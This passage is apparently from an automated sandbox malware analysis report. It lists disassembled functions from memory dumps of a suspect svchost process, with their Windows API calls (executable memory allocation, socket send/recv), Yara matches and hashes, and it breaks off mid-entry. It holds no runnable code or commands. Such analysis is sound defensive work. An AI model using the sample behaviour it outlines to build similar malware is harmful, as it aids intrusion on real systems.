                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentThread$ExchangeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033114805-0
                                                                                                              • Opcode ID: 03877518a1b2b38cc90ea8df6c4db182e0fe28993a58fcab80c23dad2eebc156
                                                                                                              • Instruction ID: 67cad6151162cda06dd5603fdb5bea59e37ce0dcb162f32e05b9ba8f81611631
                                                                                                              • Opcode Fuzzy Hash: 03877518a1b2b38cc90ea8df6c4db182e0fe28993a58fcab80c23dad2eebc156
                                                                                                              • Instruction Fuzzy Hash: C2317F70200602EFC714EF69C884A76B7E5FF44B14B10C96DE85AEB615E7B1F852CB98
                                                                                                              Function 04DF3160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04DF316B
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04DF3183
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04DF322F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CurrentThread$ExchangeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033114805-0
                                                                                                              • Opcode ID: ad68a7647655ff98dce67a19f6a121b17518dc78f77bc85b5099e5704fa53002
                                                                                                              • Instruction ID: 6fd7a3f7a4e5bf9993412571ad815bf6c72847ae61eb4242e618b00f9a5bcdb0
                                                                                                              • Opcode Fuzzy Hash: ad68a7647655ff98dce67a19f6a121b17518dc78f77bc85b5099e5704fa53002
                                                                                                              • Instruction Fuzzy Hash: A7314970300602EFDB24DF69C984A6AB3E5FF44709B12C52DEA5ACB655E731F841CB90
                                                                                                              Function 04DF5320 Relevance: 4.6, APIs: 3, Instructions: 88memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InterlockedDecrement.KERNEL32(00000008), ref: 04DF536F
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 04DF5384
                                                                                                              • SysAllocString.OLEAUT32(04E16148), ref: 04DF53D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: String$AllocDecrementFreeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 3605875487-0
                                                                                                              • Opcode ID: ab3d1f315bd773a095fbf4cb18489b9544e7e5f98f99ae3463d8de67bbeeec06
                                                                                                              • Instruction ID: 82ad09b4bc9906989f9dddb6de1706154d98f62b0a39c7257c7f8b66662b6394
                                                                                                              • Opcode Fuzzy Hash: ab3d1f315bd773a095fbf4cb18489b9544e7e5f98f99ae3463d8de67bbeeec06
                                                                                                              • Instruction Fuzzy Hash: 4C31BF71600615ABEB30DF69EC90B5AB7E8FB04B24F158629EE559B340D7B5F900CB90
                                                                                                              Function 025811B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 025811E9
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02581226
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02581255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: f2cb2eaf30531af0721681908d109d8643cbb5626ccc39a8da45874fe4639f73
                                                                                                              • Instruction ID: e22646f87f3e8b0491cc4d699f602106160bafd49520846540e79291df4b8b21
                                                                                                              • Opcode Fuzzy Hash: f2cb2eaf30531af0721681908d109d8643cbb5626ccc39a8da45874fe4639f73
                                                                                                              • Instruction Fuzzy Hash: 1F21D470F007099FDB10AFAAD845B6EFBF8FF40705F00C9ADE949E2640E670A8108B58
                                                                                                              Function 04DF11B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 04DF11E9
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 04DF1226
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DF1255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: 915a9fa2e148716aebe31088f6368804c648aa47f32514a59e2c499ce8209365
                                                                                                              • Instruction ID: b1c6b6d42eb9a4bd30fbdd42c523dc27624eb49b1d856ee1d3090b12480dc4f4
                                                                                                              • Opcode Fuzzy Hash: 915a9fa2e148716aebe31088f6368804c648aa47f32514a59e2c499ce8209365
                                                                                                              • Instruction Fuzzy Hash: 7A218E71A00709AFDB249FAADC46B6EBBF4EF40705F008969E959A2640EA34BC508750
                                                                                                              Function 02581100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 0258112F
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0258115F
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02581192
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: 3259edbcacf92c5190e6480c5e821090b12a4e45aad8d48af7cf0171055538af
                                                                                                              • Instruction ID: c488c192543b9a2e916f04d9f98ac2256d6e9568da7c493eb516ae3c7e2298b8
                                                                                                              • Opcode Fuzzy Hash: 3259edbcacf92c5190e6480c5e821090b12a4e45aad8d48af7cf0171055538af
                                                                                                              • Instruction Fuzzy Hash: 1F119670E40705ABDB10AFA9DD85B6EFBF8FF04705F0088A9E959E2240E670A954C758
                                                                                                              Function 04DF1100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 04DF112F
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 04DF115F
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DF1192
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: 21b324f654b1ead51348bd79c87cd4cafe82eccc0a56e99193ec70097208d967
                                                                                                              • Instruction ID: adc83283770ca97f09b2ea939e615320ffea9e832b63969ee375f4ad0c233017
                                                                                                              • Opcode Fuzzy Hash: 21b324f654b1ead51348bd79c87cd4cafe82eccc0a56e99193ec70097208d967
                                                                                                              • Instruction Fuzzy Hash: 4E119370A40704AFEB209FAADC85B6EFBF8FF04705F008569EE59E2240E674AD54C750
                                                                                                              Function 04DF9E30 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DF9E54
                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 04DF9E68
                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 04DF9E8B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                              • String ID:
                                                                                                              • API String ID: 800915452-0
                                                                                                              • Opcode ID: aca43b0453f72a49b657d9238aab3aeead8189201c20c3d8338a13300366f21d
                                                                                                              • Instruction ID: 5ec45144558fc182b4d8fd613833d65f0e69ef5b26eef043fc300ded8779b9ea
                                                                                                              • Opcode Fuzzy Hash: aca43b0453f72a49b657d9238aab3aeead8189201c20c3d8338a13300366f21d
                                                                                                              • Instruction Fuzzy Hash: 26F0F4B1E00219A78B20EF94D8048AFBB78FB44715B01819AED01A7300CA309E00CBD1
                                                                                                              Function 04DF9B10 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(04E1FB64), ref: 04DF9B2C
                                                                                                              • GdiplusStartup.GDIPLUS(04E1FB60,?,?), ref: 04DF9B65
                                                                                                              • LeaveCriticalSection.KERNEL32(04E1FB64), ref: 04DF9B76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                              • String ID:
                                                                                                              • API String ID: 389129658-0
                                                                                                              • Opcode ID: c45d8cacb31528159e02227081295f441617797beeb5809a3ac4ffba039e6da5
                                                                                                              • Instruction ID: c06f65bd0e1788498214e22a767e2ded35f8804edcdd12b2c364c7e24a402d20
                                                                                                              • Opcode Fuzzy Hash: c45d8cacb31528159e02227081295f441617797beeb5809a3ac4ffba039e6da5
                                                                                                              • Instruction Fuzzy Hash: E8F096759C12099FDB209FD2E87AFFAB7B8F704316F400289E91852150D779A544CFE5
                                                                                                              Function 02587236 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd_noexit.LIBCMT ref: 0258723B
                                                                                                                • Part of subcall function 02589902: GetLastError.KERNEL32(00000001,00000000,025871F2,02586FEC,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02589906
                                                                                                                • Part of subcall function 02589902: ___set_flsgetvalue.LIBCMT ref: 02589914
                                                                                                                • Part of subcall function 02589902: __calloc_crt.LIBCMT ref: 02589928
                                                                                                                • Part of subcall function 02589902: DecodePointer.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 02589942
                                                                                                                • Part of subcall function 02589902: GetCurrentThreadId.KERNEL32 ref: 02589958
                                                                                                                • Part of subcall function 02589902: SetLastError.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 02589970
                                                                                                              • __freeptd.LIBCMT ref: 02587245
                                                                                                                • Part of subcall function 02589AC4: TlsGetValue.KERNEL32(?,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589AE5
                                                                                                                • Part of subcall function 02589AC4: TlsGetValue.KERNEL32(?,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589AF7
                                                                                                                • Part of subcall function 02589AC4: DecodePointer.KERNEL32(00000000,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589B0D
                                                                                                                • Part of subcall function 02589AC4: __freefls@4.LIBCMT ref: 02589B18
                                                                                                                • Part of subcall function 02589AC4: TlsSetValue.KERNEL32(00000005,00000000,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589B2A
                                                                                                              • ExitThread.KERNEL32 ref: 0258724E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 4224061863-0
                                                                                                              • Opcode ID: d8135d9fd0254e429852768956a47d395d3be91556c286fadb91a4cf3922024f
                                                                                                              • Instruction ID: c78b53c6a0b0ac24af5cf9874cbe91ae46d85042904c348f024884b1a7ee2e84
                                                                                                              • Opcode Fuzzy Hash: d8135d9fd0254e429852768956a47d395d3be91556c286fadb91a4cf3922024f
                                                                                                              • Instruction Fuzzy Hash: FAC02B300002093B8B003B31CC0D82E3E4EBDC030879C4410F805A5140EFF0EC10DC9C
                                                                                                              Function 04DFF9B4 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd_noexit.LIBCMT ref: 04DFF9B9
                                                                                                                • Part of subcall function 04E03E32: GetLastError.KERNEL32(00000001,00000000,04DFF970,04DFF74C,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04E03E36
                                                                                                                • Part of subcall function 04E03E32: ___set_flsgetvalue.LIBCMT ref: 04E03E44
                                                                                                                • Part of subcall function 04E03E32: __calloc_crt.LIBCMT ref: 04E03E58
                                                                                                                • Part of subcall function 04E03E32: DecodePointer.KERNEL32(00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56), ref: 04E03E72
                                                                                                                • Part of subcall function 04E03E32: GetCurrentThreadId.KERNEL32 ref: 04E03E88
                                                                                                                • Part of subcall function 04E03E32: SetLastError.KERNEL32(00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56), ref: 04E03EA0
                                                                                                              • __freeptd.LIBCMT ref: 04DFF9C3
                                                                                                                • Part of subcall function 04E03FF4: TlsGetValue.KERNEL32(?,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E04015
                                                                                                                • Part of subcall function 04E03FF4: TlsGetValue.KERNEL32(?,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E04027
                                                                                                                • Part of subcall function 04E03FF4: DecodePointer.KERNEL32(00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E0403D
                                                                                                                • Part of subcall function 04E03FF4: __freefls@4.LIBCMT ref: 04E04048
                                                                                                                • Part of subcall function 04E03FF4: TlsSetValue.KERNEL32(00000013,00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E0405A
                                                                                                              • ExitThread.KERNEL32 ref: 04DFF9CC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 4224061863-0
                                                                                                              • Opcode ID: 8af508f118ff9aef96b134c854e7ca1acd4011047acce8aa0ca7d727c31453a4
                                                                                                              • Instruction ID: 6b80d1e7bf3b880c1e5fa641f8ad469612f0d79f609d0b50f2b1b960cdf2d6f1
                                                                                                              • Opcode Fuzzy Hash: 8af508f118ff9aef96b134c854e7ca1acd4011047acce8aa0ca7d727c31453a4
                                                                                                              • Instruction Fuzzy Hash: 50C08C300002452FAB103B32CC0D80BBA1D9F8020470440156D1495090DE24FC81C090
                                                                                                              Function 04DF8430 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF843D
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEF9E
                                                                                                                • Part of subcall function 04DFEF89: __CxxThrowException@8.LIBCMT ref: 04DFEFB3
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEFC4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                              • String ID: string too long
                                                                                                              • API String ID: 1823113695-2556327735
                                                                                                              • Opcode ID: 5238ac53f0d02015aea289703f10727c8d0579bc430fcfcbac986e0088ba278c
                                                                                                              • Instruction ID: 0db52dc7400e83bd8d53fba3271c010e2ab2736e560c5e346b655907f3121344
                                                                                                              • Opcode Fuzzy Hash: 5238ac53f0d02015aea289703f10727c8d0579bc430fcfcbac986e0088ba278c
                                                                                                              • Instruction Fuzzy Hash: 04E01270B515219F8B39EE348C94C2E6296AF45B113134EA9F666CF1B0DB20E80457A6
                                                                                                              Function 04C701CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 04C7022B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction ID: 6be781a4ac1f03d685ce1836c9419e3a4ca901c9a763a2376e6d126f9a319886
                                                                                                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction Fuzzy Hash: D3A15B71A00606EFDB14CFAAC880AAEB7B6FF48305F148169E515EB751E770FA51CB90
                                                                                                              Function 04DF3360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Time_memmovetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1463837790-0
                                                                                                              • Opcode ID: 694669d04593f539c9e75b845fed7f34f74247e0099f0f7e302f339ba4c77220
                                                                                                              • Instruction ID: 3c3145a7c1b67174d549d1469f88985c562f4a893094c1004e48b45b7c7e4a4a
                                                                                                              • Opcode Fuzzy Hash: 694669d04593f539c9e75b845fed7f34f74247e0099f0f7e302f339ba4c77220
                                                                                                              • Instruction Fuzzy Hash: 19517E727002069FDB25DFA9CCC0A6AB7A5FF84214717866DEE198B705EB31FC518B90
                                                                                                              Function 04DF85B0 Relevance: 3.1, APIs: 2, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::exception::exception.LIBCMT ref: 04DF864E
                                                                                                                • Part of subcall function 04DFF5D6: std::exception::_Copy_str.LIBCMT ref: 04DFF5F1
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 04DF8663
                                                                                                                • Part of subcall function 04E01265: RaiseException.KERNEL32(?,?,04DFF7D6,?,?,?,?,?,04DFF7D6,?,04E17698,04E1FBA0,?,?,04DFE064,00000068), ref: 04E012A7
                                                                                                                • Part of subcall function 04DF8720: std::exception::exception.LIBCMT ref: 04DF8752
                                                                                                                • Part of subcall function 04DF8720: __CxxThrowException@8.LIBCMT ref: 04DF8767
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
                                                                                                              • String ID:
                                                                                                              • API String ID: 1430062303-0
                                                                                                              • Opcode ID: 74368a099db5212b95c625d94b5a001ba37be2f1bc51ef0384b7d0daec4c11a7
                                                                                                              • Instruction ID: 1ed85aff6a4fde40b436bd0882a25392cf0810842207017925b59b253df033d8
                                                                                                              • Opcode Fuzzy Hash: 74368a099db5212b95c625d94b5a001ba37be2f1bc51ef0384b7d0daec4c11a7
                                                                                                              • Instruction Fuzzy Hash: F541B6B1A00205DBDB24EF68CC446AEB7F5FF44714F154A2EE92697780E734B910DBA2
                                                                                                              Function 02582FA0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02583013
                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 02583034
                                                                                                                • Part of subcall function 025871ED: __getptd_noexit.LIBCMT ref: 025871ED
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 4248608111-0
                                                                                                              • Opcode ID: 64e1ba8f9df031f4d4c43ff39b76b84292b7e5f4a98d33d9083d18581a2f0473
                                                                                                              • Instruction ID: e516a96ccfbc0552d5bc7ccef900ebd482a040af75d73eddc11637c61510f2b8
                                                                                                              • Opcode Fuzzy Hash: 64e1ba8f9df031f4d4c43ff39b76b84292b7e5f4a98d33d9083d18581a2f0473
                                                                                                              • Instruction Fuzzy Hash: 67219671D00208EBDB20BF64CC88BAA77A5FF45714F1005E5E9447B194D7F0A984CF69
                                                                                                              Function 04DF2FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04DF3043
                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 04DF3064
                                                                                                                • Part of subcall function 04DFF96B: __getptd_noexit.LIBCMT ref: 04DFF96B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 4248608111-0
                                                                                                              • Opcode ID: e4dbafae5dc407c68e03ef3992c6ba13a5ec1112f2be93e5df91c6f972062619
                                                                                                              • Instruction ID: e7dc4cb57753af9807a3d4371214e09462d71a6d25764538ba5d45bb9cb1d8a5
                                                                                                              • Opcode Fuzzy Hash: e4dbafae5dc407c68e03ef3992c6ba13a5ec1112f2be93e5df91c6f972062619
                                                                                                              • Instruction Fuzzy Hash: FD21A5707002089BEB30EF69CC84B9A73A4FF05314F1645A6EF14AB290D670BD84CBA1
                                                                                                              Function 02583230 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • send.WS2_32(?,?,00040000,00000000), ref: 02583261
                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 0258329E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: send
                                                                                                              • String ID:
                                                                                                              • API String ID: 2809346765-0
                                                                                                              • Opcode ID: e69bd955157d818937de600f45d0dd7f382629ac16679c39a62ebfd32effffa7
                                                                                                              • Instruction ID: 003a4fde728e72538886fc5359b1191368494b9c35ee6bcb48843df0a39ea2ab
                                                                                                              • Opcode Fuzzy Hash: e69bd955157d818937de600f45d0dd7f382629ac16679c39a62ebfd32effffa7
                                                                                                              • Instruction Fuzzy Hash: 3F112972B01204B7D710DA29DC84B4E7B59FB81724F1001B1E90EF7140D3B0D945965A
                                                                                                              Function 04DF3260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • send.WS2_32(?,?,00040000,00000000), ref: 04DF3291
